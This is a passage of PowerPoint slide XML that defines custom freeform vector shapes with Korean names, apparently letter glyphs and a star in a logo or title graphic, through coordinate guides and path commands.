              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2692439" y="4500650"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 85439 w 76200"/>
                  <a:gd name="connsiteY0" fmla="*/ 35433 h 76200"/>
                  <a:gd name="connsiteX1" fmla="*/ 56388 w 76200"/>
                  <a:gd name="connsiteY1" fmla="*/ 28099 h 76200"/>
                  <a:gd name="connsiteX2" fmla="*/ 45910 w 76200"/>
                  <a:gd name="connsiteY2" fmla="*/ 0 h 76200"/>
                  <a:gd name="connsiteX3" fmla="*/ 29909 w 76200"/>
                  <a:gd name="connsiteY3" fmla="*/ 25432 h 76200"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 76200"/>
                  <a:gd name="connsiteY4" fmla="*/ 26670 h 76200"/>
                  <a:gd name="connsiteX5" fmla="*/ 19241 w 76200"/>
                  <a:gd name="connsiteY5" fmla="*/ 49721 h 76200"/>
                  <a:gd name="connsiteX6" fmla="*/ 11144 w 76200"/>
                  <a:gd name="connsiteY6" fmla="*/ 78581 h 76200"/>
                  <a:gd name="connsiteX7" fmla="*/ 38957 w 76200"/>
                  <a:gd name="connsiteY7" fmla="*/ 67437 h 76200"/>
                  <a:gd name="connsiteX8" fmla="*/ 64008 w 76200"/>
                  <a:gd name="connsiteY8" fmla="*/ 84011 h 76200"/>
                  <a:gd name="connsiteX9" fmla="*/ 61912 w 76200"/>
                  <a:gd name="connsiteY9" fmla="*/ 54102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200" h="76200">
                    <a:moveTo>
                      <a:pt x="85439" y="35433"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="56388" y="28099"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45910" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29909" y="25432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="26670"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19241" y="49721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11144" y="78581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38957" y="67437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64008" y="84011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61912" y="54102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7" name="자유형: 도형 81">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2DF02AD-EE44-E045-A52D-ED11013462B9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2765020" y="4146034"/>
                <a:ext cx="247650" cy="247650"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 99250 w 247650"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX1" fmla="*/ 0 w 247650"/>
                  <a:gd name="connsiteY1" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX2" fmla="*/ 60293 w 247650"/>
                  <a:gd name="connsiteY2" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX3" fmla="*/ 77724 w 247650"/>
                  <a:gd name="connsiteY3" fmla="*/ 206978 h 247650"/>
                  <a:gd name="connsiteX4" fmla="*/ 178498 w 247650"/>
                  <a:gd name="connsiteY4" fmla="*/ 206978 h 247650"/>
                  <a:gd name="connsiteX5" fmla="*/ 198311 w 247650"/>
                  <a:gd name="connsiteY5" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX6" fmla="*/ 253079 w 247650"/>
                  <a:gd name="connsiteY6" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX7" fmla="*/ 154781 w 247650"/>
                  <a:gd name="connsiteY7" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX8" fmla="*/ 99250 w 247650"/>
                  <a:gd name="connsiteY8" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX9" fmla="*/ 90488 w 247650"/>
                  <a:gd name="connsiteY9" fmla="*/ 163259 h 247650"/>
                  <a:gd name="connsiteX10" fmla="*/ 128206 w 247650"/>
                  <a:gd name="connsiteY10" fmla="*/ 60103 h 247650"/>
                  <a:gd name="connsiteX11" fmla="*/ 165925 w 247650"/>
                  <a:gd name="connsiteY11" fmla="*/ 163259 h 247650"/>
                  <a:gd name="connsiteX12" fmla="*/ 90488 w 247650"/>
                  <a:gd name="connsiteY12" fmla="*/ 163259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7650" h="247650">
                    <a:moveTo>
                      <a:pt x="99250" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60293" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77724" y="206978"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178498" y="206978"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198311" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253079" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154781" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99250" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="90488" y="163259"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="128206" y="60103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165925" y="163259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90488" y="163259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8" name="자유형: 도형 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66CA9874-9EA9-F44B-8E16-29EF3F6EA7B3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2996858" y="4146034"/>
                <a:ext cx="342900" cy="247650"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 294418 w 342900"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX1" fmla="*/ 242887 w 342900"/>
                  <a:gd name="connsiteY1" fmla="*/ 151829 h 247650"/>
                  <a:gd name="connsiteX2" fmla="*/ 192024 w 342900"/>
                  <a:gd name="connsiteY2" fmla="*/ 7715 h 247650"/>
                  <a:gd name="connsiteX3" fmla="*/ 156305 w 342900"/>
                  <a:gd name="connsiteY3" fmla="*/ 7715 h 247650"/>
                  <a:gd name="connsiteX4" fmla="*/ 105537 w 342900"/>
                  <a:gd name="connsiteY4" fmla="*/ 151829 h 247650"/>
                  <a:gd name="connsiteX5" fmla="*/ 55531 w 342900"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX6" fmla="*/ 0 w 342900"/>
                  <a:gd name="connsiteY6" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX7" fmla="*/ 80962 w 342900"/>
                  <a:gd name="connsiteY7" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX8" fmla="*/ 126206 w 342900"/>
                  <a:gd name="connsiteY8" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX9" fmla="*/ 173831 w 342900"/>
                  <a:gd name="connsiteY9" fmla="*/ 109252 h 247650"/>
                  <a:gd name="connsiteX10" fmla="*/ 221456 w 342900"/>
                  <a:gd name="connsiteY10" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX11" fmla="*/ 268224 w 342900"/>
                  <a:gd name="connsiteY11" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX12" fmla="*/ 347662 w 342900"/>
                  <a:gd name="connsiteY12" fmla="*/ 0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2900" h="247650">
                    <a:moveTo>
                      <a:pt x="294418" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="242887" y="151829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192024" y="7715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156305" y="7715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105537" y="151829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55531" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80962" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126206" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173831" y="109252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221456" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268224" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347662" y="0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59" name="자유형: 도형 83">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5ADE185-A9A1-3547-AE32-02289264CDC0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3597600" y="4146034"/>
                <a:ext cx="219075" cy="247650"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 165164 w 219075"/>
                  <a:gd name="connsiteY0" fmla="*/ 208502 h 247650"/>
                  <a:gd name="connsiteX1" fmla="*/ 134969 w 219075"/>
                  <a:gd name="connsiteY1" fmla="*/ 156115 h 247650"/>
                  <a:gd name="connsiteX2" fmla="*/ 194501 w 219075"/>
                  <a:gd name="connsiteY2" fmla="*/ 77534 h 247650"/>
                  <a:gd name="connsiteX3" fmla="*/ 159544 w 219075"/>
                  <a:gd name="connsiteY3" fmla="*/ 14383 h 247650"/>
                  <a:gd name="connsiteX4" fmla="*/ 107728 w 219075"/>
                  <a:gd name="connsiteY4" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 219075"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX6" fmla="*/ 0 w 219075"/>
                  <a:gd name="connsiteY6" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX7" fmla="*/ 50768 w 219075"/>
                  <a:gd name="connsiteY7" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX8" fmla="*/ 50768 w 219075"/>
                  <a:gd name="connsiteY8" fmla="*/ 156115 h 247650"/>
                  <a:gd name="connsiteX9" fmla="*/ 92011 w 219075"/>
                  <a:gd name="connsiteY9" fmla="*/ 156115 h 247650"/>
                  <a:gd name="connsiteX10" fmla="*/ 164021 w 219075"/>
                  <a:gd name="connsiteY10" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX11" fmla="*/ 223456 w 219075"/>
                  <a:gd name="connsiteY11" fmla="*/ 232219 h 247650"/>
                  <a:gd name="connsiteX12" fmla="*/ 200406 w 219075"/>
                  <a:gd name="connsiteY12" fmla="*/ 200882 h 247650"/>
                  <a:gd name="connsiteX13" fmla="*/ 165164 w 219075"/>
                  <a:gd name="connsiteY13" fmla="*/ 208502 h 247650"/>
                  <a:gd name="connsiteX14" fmla="*/ 114776 w 219075"/>
                  <a:gd name="connsiteY14" fmla="*/ 118396 h 247650"/>
                  <a:gd name="connsiteX15" fmla="*/ 49911 w 219075"/>
                  <a:gd name="connsiteY15" fmla="*/ 118396 h 247650"/>
                  <a:gd name="connsiteX16" fmla="*/ 49911 w 219075"/>
                  <a:gd name="connsiteY16" fmla="*/ 42196 h 247650"/>
                  <a:gd name="connsiteX17" fmla="*/ 111919 w 219075"/>
                  <a:gd name="connsiteY17" fmla="*/ 42196 h 247650"/>
                  <a:gd name="connsiteX18" fmla="*/ 143351 w 219075"/>
                  <a:gd name="connsiteY18" fmla="*/ 80296 h 247650"/>
                  <a:gd name="connsiteX19" fmla="*/ 114776 w 219075"/>
                  <a:gd name="connsiteY19" fmla="*/ 118396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19075" h="247650">
                    <a:moveTo>
                      <a:pt x="165164" y="208502"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="135255" y="197930"/>
                      <a:pt x="134969" y="156115"/>
                      <a:pt x="134969" y="156115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134969" y="156115"/>
                      <a:pt x="194501" y="142589"/>
                      <a:pt x="194501" y="77534"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="194501" y="44958"/>
                      <a:pt x="177070" y="25622"/>
                      <a:pt x="159544" y="14383"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144209" y="4477"/>
                      <a:pt x="126016" y="0"/>
                      <a:pt x="107728" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50768" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50768" y="156115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92011" y="156115"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="92011" y="156115"/>
                      <a:pt x="99536" y="250603"/>
                      <a:pt x="164021" y="250603"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="212598" y="250603"/>
                      <a:pt x="223456" y="232219"/>
                      <a:pt x="223456" y="232219"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="200406" y="200882"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="200692" y="200787"/>
                      <a:pt x="184690" y="215456"/>
                      <a:pt x="165164" y="208502"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="114776" y="118396"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="49911" y="118396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49911" y="42196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111919" y="42196"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="111919" y="42196"/>
                      <a:pt x="143351" y="43434"/>
                      <a:pt x="143351" y="80296"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143351" y="117158"/>
                      <a:pt x="114776" y="118396"/>
                      <a:pt x="114776" y="118396"/>
                    </a:cubicBez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0" name="자유형: 도형 84">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAF0F70-99AC-EE46-AD59-482E26581C4A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3846964" y="4145939"/>
                <a:ext cx="219075" cy="247650"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 128683 w 219075"/>
                  <a:gd name="connsiteY0" fmla="*/ 6477 h 247650"/>
                  <a:gd name="connsiteX1" fmla="*/ 92297 w 219075"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX2" fmla="*/ 0 w 219075"/>
                  <a:gd name="connsiteY2" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 219075"/>
                  <a:gd name="connsiteY3" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX4" fmla="*/ 77343 w 219075"/>
                  <a:gd name="connsiteY4" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX5" fmla="*/ 172784 w 219075"/>
                  <a:gd name="connsiteY5" fmla="*/ 221551 h 247650"/>
                  <a:gd name="connsiteX6" fmla="*/ 225076 w 219075"/>
                  <a:gd name="connsiteY6" fmla="*/ 125349 h 247650"/>
                  <a:gd name="connsiteX7" fmla="*/ 128683 w 219075"/>
                  <a:gd name="connsiteY7" fmla="*/ 6477 h 247650"/>
                  <a:gd name="connsiteX8" fmla="*/ 86868 w 219075"/>
                  <a:gd name="connsiteY8" fmla="*/ 213741 h 247650"/>
                  <a:gd name="connsiteX9" fmla="*/ 49911 w 219075"/>
                  <a:gd name="connsiteY9" fmla="*/ 213741 h 247650"/>
                  <a:gd name="connsiteX10" fmla="*/ 49911 w 219075"/>
                  <a:gd name="connsiteY10" fmla="*/ 42291 h 247650"/>
                  <a:gd name="connsiteX11" fmla="*/ 85154 w 219075"/>
                  <a:gd name="connsiteY11" fmla="*/ 42291 h 247650"/>
                  <a:gd name="connsiteX12" fmla="*/ 111824 w 219075"/>
                  <a:gd name="connsiteY12" fmla="*/ 46863 h 247650"/>
                  <a:gd name="connsiteX13" fmla="*/ 173069 w 219075"/>
                  <a:gd name="connsiteY13" fmla="*/ 128016 h 247650"/>
                  <a:gd name="connsiteX14" fmla="*/ 130778 w 219075"/>
                  <a:gd name="connsiteY14" fmla="*/ 200597 h 247650"/>
                  <a:gd name="connsiteX15" fmla="*/ 86868 w 219075"/>
                  <a:gd name="connsiteY15" fmla="*/ 213741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9075" h="247650">
                    <a:moveTo>
                      <a:pt x="128683" y="6477"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="116967" y="2191"/>
                      <a:pt x="104680" y="0"/>
                      <a:pt x="92297" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77343" y="250603"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="111347" y="250603"/>
                      <a:pt x="144971" y="241078"/>
                      <a:pt x="172784" y="221551"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="199834" y="202406"/>
                      <a:pt x="225076" y="172117"/>
                      <a:pt x="225076" y="125349"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224980" y="51911"/>
                      <a:pt x="162496" y="18955"/>
                      <a:pt x="128683" y="6477"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="86868" y="213741"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="49911" y="213741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49911" y="42291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85154" y="42291"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="94202" y="42291"/>
                      <a:pt x="103346" y="43625"/>
                      <a:pt x="111824" y="46863"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132493" y="54578"/>
                      <a:pt x="173069" y="75057"/>
                      <a:pt x="173069" y="128016"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173069" y="167640"/>
                      <a:pt x="147161" y="189071"/>
                      <a:pt x="130778" y="200597"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118110" y="209550"/>
                      <a:pt x="102584" y="213741"/>
                      <a:pt x="86868" y="213741"/>
                    </a:cubicBez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1" name="자유형: 도형 85">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0897114-1532-FA4A-BFC4-21C8C6315488}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4085851" y="4146034"/>
                <a:ext cx="180975" cy="247650"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 100013 w 180975"/>
                  <a:gd name="connsiteY0" fmla="*/ 103727 h 247650"/>
                  <a:gd name="connsiteX1" fmla="*/ 63532 w 180975"/>
                  <a:gd name="connsiteY1" fmla="*/ 60674 h 247650"/>
                  <a:gd name="connsiteX2" fmla="*/ 140779 w 180975"/>
                  <a:gd name="connsiteY2" fmla="*/ 70199 h 247650"/>
                  <a:gd name="connsiteX3" fmla="*/ 180975 w 180975"/>
                  <a:gd name="connsiteY3" fmla="*/ 46577 h 247650"/>
                  <a:gd name="connsiteX4" fmla="*/ 96869 w 180975"/>
                  <a:gd name="connsiteY4" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX5" fmla="*/ 13525 w 180975"/>
                  <a:gd name="connsiteY5" fmla="*/ 77534 h 247650"/>
                  <a:gd name="connsiteX6" fmla="*/ 97250 w 180975"/>
                  <a:gd name="connsiteY6" fmla="*/ 148971 h 247650"/>
                  <a:gd name="connsiteX7" fmla="*/ 134969 w 180975"/>
                  <a:gd name="connsiteY7" fmla="*/ 187833 h 247650"/>
                  <a:gd name="connsiteX8" fmla="*/ 97250 w 180975"/>
                  <a:gd name="connsiteY8" fmla="*/ 209264 h 247650"/>
                  <a:gd name="connsiteX9" fmla="*/ 41243 w 180975"/>
                  <a:gd name="connsiteY9" fmla="*/ 175165 h 247650"/>
                  <a:gd name="connsiteX10" fmla="*/ 0 w 180975"/>
                  <a:gd name="connsiteY10" fmla="*/ 187833 h 247650"/>
                  <a:gd name="connsiteX11" fmla="*/ 101632 w 180975"/>
                  <a:gd name="connsiteY11" fmla="*/ 250508 h 247650"/>
                  <a:gd name="connsiteX12" fmla="*/ 186595 w 180975"/>
                  <a:gd name="connsiteY12" fmla="*/ 173546 h 247650"/>
                  <a:gd name="connsiteX13" fmla="*/ 100013 w 180975"/>
                  <a:gd name="connsiteY13" fmla="*/ 103727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0975" h="247650">
                    <a:moveTo>
                      <a:pt x="100013" y="103727"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="66484" y="103727"/>
                      <a:pt x="59722" y="73724"/>
                      <a:pt x="63532" y="60674"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68866" y="42196"/>
                      <a:pt x="115348" y="22574"/>
                      <a:pt x="140779" y="70199"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="180975" y="46577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="180975" y="46577"/>
                      <a:pt x="165925" y="0"/>
                      <a:pt x="96869" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21431" y="0"/>
                      <a:pt x="13525" y="48578"/>
                      <a:pt x="13525" y="77534"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13525" y="106489"/>
                      <a:pt x="43720" y="148971"/>
                      <a:pt x="97250" y="148971"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138493" y="148971"/>
                      <a:pt x="134969" y="187833"/>
                      <a:pt x="134969" y="187833"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134969" y="187833"/>
                      <a:pt x="132588" y="209264"/>
                      <a:pt x="97250" y="209264"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53150" y="209264"/>
                      <a:pt x="41243" y="175165"/>
                      <a:pt x="41243" y="175165"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="187833"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="187833"/>
                      <a:pt x="10287" y="250508"/>
                      <a:pt x="101632" y="250508"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="184404" y="250508"/>
                      <a:pt x="187452" y="189929"/>
                      <a:pt x="186595" y="173546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="185547" y="156115"/>
                      <a:pt x="168307" y="103727"/>
                      <a:pt x="100013" y="103727"/>
                    </a:cubicBez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2" name="자유형: 도형 86">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE6C7B6-68B0-A14F-BAA7-B7AD6BBA036C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3322899" y="4146034"/>
                <a:ext cx="247650" cy="247650"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 99155 w 247650"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX1" fmla="*/ 0 w 247650"/>
                  <a:gd name="connsiteY1" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX2" fmla="*/ 60293 w 247650"/>
                  <a:gd name="connsiteY2" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX3" fmla="*/ 77724 w 247650"/>
                  <a:gd name="connsiteY3" fmla="*/ 206978 h 247650"/>
                  <a:gd name="connsiteX4" fmla="*/ 178498 w 247650"/>
                  <a:gd name="connsiteY4" fmla="*/ 206978 h 247650"/>
                  <a:gd name="connsiteX5" fmla="*/ 198311 w 247650"/>
                  <a:gd name="connsiteY5" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX6" fmla="*/ 253079 w 247650"/>
                  <a:gd name="connsiteY6" fmla="*/ 250603 h 247650"/>
                  <a:gd name="connsiteX7" fmla="*/ 154686 w 247650"/>
                  <a:gd name="connsiteY7" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX8" fmla="*/ 99155 w 247650"/>
                  <a:gd name="connsiteY8" fmla="*/ 0 h 247650"/>
                  <a:gd name="connsiteX9" fmla="*/ 90488 w 247650"/>
                  <a:gd name="connsiteY9" fmla="*/ 163259 h 247650"/>
                  <a:gd name="connsiteX10" fmla="*/ 128206 w 247650"/>
                  <a:gd name="connsiteY10" fmla="*/ 60103 h 247650"/>
                  <a:gd name="connsiteX11" fmla="*/ 165925 w 247650"/>
                  <a:gd name="connsiteY11" fmla="*/ 163259 h 247650"/>
                  <a:gd name="connsiteX12" fmla="*/ 90488 w 247650"/>
                  <a:gd name="connsiteY12" fmla="*/ 163259 h 247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7650" h="247650">
                    <a:moveTo>
                      <a:pt x="99155" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60293" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77724" y="206978"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178498" y="206978"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198311" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253079" y="250603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154686" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99155" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="90488" y="163259"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="128206" y="60103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165925" y="163259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90488" y="163259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 dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="63" name="자유형: 도형 87">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA39804C-035C-3949-8141-C9E3016BD452}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2782450" y="3938008"/>
                <a:ext cx="95250" cy="123825"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 39624 w 95250"/>
                  <a:gd name="connsiteY0" fmla="*/ 20384 h 123825"/>
                  <a:gd name="connsiteX1" fmla="*/ 0 w 95250"/>
                  <a:gd name="connsiteY1" fmla="*/ 20384 h 123825"/>
                  <a:gd name="connsiteX2" fmla="*/ 0 w 95250"/>
                  <a:gd name="connsiteY2" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX3" fmla="*/ 101251 w 95250"/>
                  <a:gd name="connsiteY3" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX4" fmla="*/ 101251 w 95250"/>
                  <a:gd name="connsiteY4" fmla="*/ 20288 h 123825"/>
